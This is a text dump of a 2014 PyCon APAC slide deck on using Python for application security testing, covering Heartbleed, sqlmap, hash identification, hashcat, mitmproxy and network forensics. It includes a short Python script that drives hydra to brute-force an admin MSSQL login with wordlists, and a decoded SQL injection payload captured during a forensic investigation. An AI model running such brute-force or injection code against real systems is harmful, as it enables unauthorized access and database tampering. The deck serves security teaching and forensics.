Python for Application Security Testing Zaki Akhmad PyCon APAC 2014 May 18, 2014 Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 1 / 41 

hen gao xing ren shi ni Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 2 / 41 

About Me Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 3 / 41 

Zaki Akhmad @zakiakhmad Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 4 / 41 

Python Indonesia Meetup Organizer Planet Python Indonesia Maintainer Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 5 / 41 

Security Analyst Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 6 / 41 

This talk won’t be a rocket-science talk Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 7 / 41 

Heartbleed Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 8 / 41 

Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 9 / 41 

Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 10 / 41 

Python script to test heartbleed vulnerability https://github.com/musalbas/heartbleed-masstest Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 11 / 41 

Detect and Exploit SQL Injection Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 12 / 41 

Exploits of a Mom, XKCD #327 Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 13 / 41 

#1. Injection Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 14 / 41 

SQL Injection is (mostly) about the unauthorized DBMS data access Miroslav Stampar, sqlmap Developer Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 15 / 41 

SQL Injection techniques: Blind Error Union (partial and full) Time Stacked Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 16 / 41 

sqlmap - Project Statistic http://www.ohloh.net/p/sqlmap Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 17 / 41 

Dump DBMS database table entries Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 18 / 41 

Contribution Feature request Configure output directory Retrieve database server IP address Add Indonesian common-columns Bug [CRITICAL] unhandled exception Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 19 / 41 

Identify Hash Algorithm Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 20 / 41 

If you found hashed passwords with a-f,0-9 and length 32, it might be: MD5 Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 21 / 41 

hash-identifier: python script to identify hashes algorithm Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 22 / 41 

We need to know the hash algorithm to crack it Security is only as strong as the weakest link And the most frequent weakest link is password Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 23 / 41 

$ hashcat-0.47 ./hashcat-cli64.bin --help hashcat, advanced password recovery Usage: hashcat [options] hashfile [mask|wordfiles|directories] ... Hash type 0 = MD5 10 = md5($pass.$salt) 50 = HMAC-MD5 (key = $pass) 100 = SHA1 200 = MySQL 400 = phpass, MD5(Wordpress), MD5(phpBB3) 500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5 800 = SHA-1(Django) hashcat: advanced password recovery Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 24 / 41 

hydra: A very fast network logon cracker dictionary attack: trying to login using words in the dictionary python script to execute hydra for multiple dictionary files (wordlists) Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 25 / 41 

hydra-multiple-wordlist.py import threading import os from subprocess importcall def listdir_fullpath(d): return [os.path.join(d, f) for f in os.listdir(d)] def main(): wordlists = listdir_fullpath("/home/za/tools/wordlist") for wordlist in wordlists: print in progress using %s wordlist % wordlist call([hydra, -l, admin, -P, wordlist, 192.168.99.66,mssql,-v, -t, 128]) print done if __name__ == __main__: main() Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 26 / 41 

Proxy - Network Traffic Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 27 / 41 

web browser - proxy - server mobile apps - proxy - server Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 28 / 41 

mitmproxy mitmproxy: a man-in-the-middle proxy intercept, modify, replay and save HTTP/S traffic Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 29 / 41 

mitmproxy analyzing HTTPS connection Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 30 / 41 

mitmproxy analyzing POST request Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 31 / 41 

Network Forensic Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 32 / 41 

Client: We have deployed (network) firewall but we still got attacked by SQL injection Starting the forensic by capturing all network traffic Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 33 / 41 

sqlinject-finder Script parses through a pcap and looks for common SQL inject characteristics Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 34 / 41 

sqlinject-finder # tcpdump -i eth0 port 80 -s0 -G 3600 -w packet_%Y%m%d.%H%M.pcap Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 35 / 41 

sqlinject-finder $ python sqlinject-finder.py -f packet_20140518.1530.pcap Source : xxx.80.8.88 Page : /transfertoasp.aspx Value : id=143) declar @s varchar(4000) i set @s=cast(0x20736557420616e7369.... Frame : 52653 Reason : Possible use of SQL syntax in variable Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 36 / 41 

sqlinject-finder We need to decode it Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 37 / 41 

sqlinject-finder #!/usr/bin/python import binascii binascii.unhexlify() Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 38 / 41 

sqlinject-finder Decoded packet set ansi_warnings off DECLARE @T VARCHAR(255), @C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in (\’nvarchar\’, \’varchar\’, \’ntext\’, \’text\’,and c.CHARACTER_MAXIMUM_LENGHT>30 and t.table_name=c.table_name and t.table_type=\’BASE TABLE\’ OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T, @C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(\’UPDATE [\’+@T+\’] SET [\’+@C+\’]=\’\’"> Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 39 / 41 

Wrap Up Heartbleed SQL injection Hash algorithm Proxy Network forensic ... and many more! Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 40 / 41 

Zaki Akhmad (PyCon APAC 2014) Python for Application Security Testing May 18, 2014 41 / 41